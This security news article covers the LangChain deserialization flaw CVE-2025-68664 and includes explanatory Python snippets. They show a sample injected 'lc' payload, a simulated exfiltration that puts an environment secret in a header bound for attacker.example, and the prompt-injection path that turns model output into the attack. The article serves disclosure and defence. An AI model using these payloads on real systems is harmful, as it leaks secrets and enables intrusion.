A recently disclosed flaw in LangChain, tracked as CVE-2025-68664, allows attackers to extract sensitive information from AI systems. The vulnerability stems from a deserialization issue through which attackers can exfiltrate critical environment variables and execute unauthorized code.
"This problem could significantly compromise the integrity of AI applications, especially given the prevalence of LangChain across various platforms," explained a Cyata security researcher who was instrumental in discovering the issue. LangChain is one of the most widely adopted AI frameworks, with downloads totaling in the hundreds of millions, which amplifies the severity of the vulnerability.

The root of the problem lies in the failure of the dumps() and dumpd() functions in langchain-core to properly escape user-controlled dictionaries that contain the reserved “lc” key. Because this key marks internal serialized objects, unescaped user data can be mistaken for those objects during serialization-deserialization cycles.
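To make the collision concrete, here is a simplified model of the flaw, not LangChain's actual code: a serializer that never escapes a reserved “lc” key, paired with a deserializer that treats any dict carrying that key as a serialized internal object.

```python
import json

def naive_dumps(obj) -> str:
    """Serialize without escaping a reserved 'lc' key in plain dicts (the flaw)."""
    return json.dumps(obj)

def naive_loads(data: str):
    """Treat any dict carrying an 'lc' key as a serialized internal object."""
    def hook(d):
        if "lc" in d:
            # A real deserializer would reconstruct the object named here;
            # user data containing 'lc' is indistinguishable from a marker.
            return f"<reconstructed {d.get('id')}>"
        return d
    return json.loads(data, object_hook=hook)

# User-controlled content that merely *looks* like an internal marker
# round-trips into an object reconstruction instead of staying plain data.
user_field = {"note": "hello", "lc": 1, "id": ["some", "Class"]}
print(naive_loads(naive_dumps(user_field)))  # → <reconstructed ['some', 'Class']>
```

The key point is that nothing in the wire format distinguishes attacker-supplied data from a legitimate object marker once the reserved key is left unescaped.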
Impact and Legacy
"When LLM outputs or prompt injections influence fields like additional_kwargs or response_metadata, it can cause deserialization of untrusted data, putting systems at risk," noted the researcher. Twelve vulnerable patterns were identified, and the flaw was assigned a critical CVSS score of 9.3, underscoring how readily it could be exploited.
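The shape of such a payload can be sketched as follows. The {"lc": ..., "type": "constructor", ...} envelope reflects LangChain's documented serialization format, but the class path and field values here are made up for illustration:

```python
import json

# Attacker-influenced text that ends up in a field like additional_kwargs:
injected = {
    "lc": 1,
    "type": "constructor",
    "id": ["some", "allowlisted", "Class"],   # hypothetical class path
    "kwargs": {"attacker": "controlled"},
}
message = {"content": "benign text", "additional_kwargs": injected}

# After a serialize/deserialize round trip the marker is still present, so a
# deserializer keyed on "lc" would treat it as an object to reconstruct.
round_tripped = json.loads(json.dumps(message))
assert round_tripped["additional_kwargs"]["lc"] == 1
```

Any pipeline that later feeds such a message back through a trusting loader turns the LLM output itself into a deserialization sink.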

The Cyata researcher identified the issue during audits of AI trust boundaries, specifically while tracking deserialization sinks and hunting for weaknesses in serialization code.
"It’s crucial for organizations to promptly attend to these vulnerabilities to prevent data breaches and unauthorized access," advised the researcher. The flaw was first reported via the Huntr platform on December 4, 2025, and LangChain responded quickly, publishing an advisory on December 24, shortly after confirming the issue.
To address the flaw, LangChain released patches in versions 0.3.81 and 1.2.5, which wrap dictionaries containing the “lc” key and disable the previously enabled secrets_from_env feature, which could leak sensitive environment variables.
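The wrapping idea can be illustrated with a generic escape/unescape pair. The wrapper key and structure below are hypothetical, not the patch's actual implementation:

```python
import json

SENTINEL = "__user_dict__"   # hypothetical wrapper key (assumes no collision with real data)

def safe_dumps(obj) -> str:
    """Wrap any user dict containing 'lc' so it can't be mistaken for a marker."""
    def escape(o):
        if isinstance(o, dict):
            o = {k: escape(v) for k, v in o.items()}
            return {SENTINEL: o} if "lc" in o else o
        if isinstance(o, list):
            return [escape(v) for v in o]
        return o
    return json.dumps(escape(obj))

def safe_loads(data: str):
    """Unwrap sentinel-wrapped dicts; refuse any unexpected 'lc' marker."""
    def unescape(o):
        if isinstance(o, dict):
            if SENTINEL in o and len(o) == 1:
                inner = o[SENTINEL]   # plain user data: restore without reinterpreting
                return {k: unescape(v) for k, v in inner.items()}
            if "lc" in o:
                raise ValueError("refusing to reconstruct unexpected 'lc' object")
            return {k: unescape(v) for k, v in o.items()}
        if isinstance(o, list):
            return [unescape(v) for v in o]
        return o
    return unescape(json.loads(data))

payload = {"lc": 1, "id": ["evil", "Class"]}
assert safe_loads(safe_dumps(payload)) == payload   # survives as plain data
```

The design choice is that escaping happens at serialization time, so the deserializer can treat any unwrapped “lc” dict as hostile input rather than guessing its provenance.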
Attackers exploiting this vulnerability could place environment variables in request headers to exfiltrate data. "They might create prompts to instantiate allowlisted classes, leading to severe risks such as SSRF (Server Side Request Forgery)," warned a cybersecurity analyst. Moreover, if deserialization occurs after use of the PromptTemplate feature, it can enable Jinja2 rendering, potentially resulting in remote code execution.
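A simulated version of the headers-based exfiltration path is shown below. The function name and the "env:" reference syntax are illustrative stand-ins for a secrets_from_env-style resolver, not LangChain's API, and no network request is actually made:

```python
import os

def resolve_secrets(obj):
    """Replace 'env:NAME' strings with the value of environment variable NAME."""
    if isinstance(obj, dict):
        return {k: resolve_secrets(v) for k, v in obj.items()}
    if isinstance(obj, str) and obj.startswith("env:"):
        return os.environ.get(obj[4:], "")
    return obj

os.environ["API_TOKEN"] = "s3cret"   # stand-in for a real secret

# Attacker-supplied payload asks the loader to place a secret in a header
# on a request destined for an attacker-controlled URL:
payload = {"url": "https://attacker.example/", "headers": {"X-Leak": "env:API_TOKEN"}}
request = resolve_secrets(payload)
assert request["headers"]["X-Leak"] == "s3cret"   # the secret now travels with the request
```

Once a deserializer resolves secret references on the attacker's behalf, any field that ends up on the wire becomes an exfiltration channel.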
LangChain's rapid growth compounds the risk: recent statistics show more than 98 million downloads in the past month alone. Organizations should therefore assess their use of LangChain without delay.
"It’s essential to verify dependencies like langchain-community and update langchain-core urgently. Organizations should also disable secret resolution until they validate inputs and audit deserialization processes within their logs and streaming data," recommended a leading cybersecurity expert.
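As a starting point for that dependency check, a script along these lines could compare the installed langchain-core against the patched releases (0.3.81 on the 0.3.x line, 1.2.5 on the 1.x line, per the advisory). The parse_version helper handles plain dotted numeric versions only:

```python
from importlib.metadata import version, PackageNotFoundError

def parse_version(v: str) -> tuple:
    """Parse a plain dotted numeric version like '0.3.81' into a comparable tuple."""
    return tuple(int(p) for p in v.split("."))

def is_patched(installed: str) -> bool:
    """True if the given langchain-core version includes the CVE-2025-68664 fix."""
    v = parse_version(installed)
    if v[:2] == (0, 3):
        return v >= (0, 3, 81)   # 0.3.x line fixed in 0.3.81
    return v >= (1, 2, 5)        # 1.x line fixed in 1.2.5

try:
    print("patched:", is_patched(version("langchain-core")))
except PackageNotFoundError:
    print("langchain-core is not installed")
```

This checks only the version string; auditing logs and streaming data for suspicious “lc”-marked payloads, as recommended above, still requires manual review.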
Additionally, a related flaw identified in LangChainJS, marked as CVE-2025-68665, underscores the pervasive issues within agentic AI implementations and the need for heightened scrutiny.
As AI applications gain rapid traction, experts emphasize the importance of conducting thorough inventories of current agent deployments. This proactive step is critical for swift identification and resolution of potential vulnerabilities.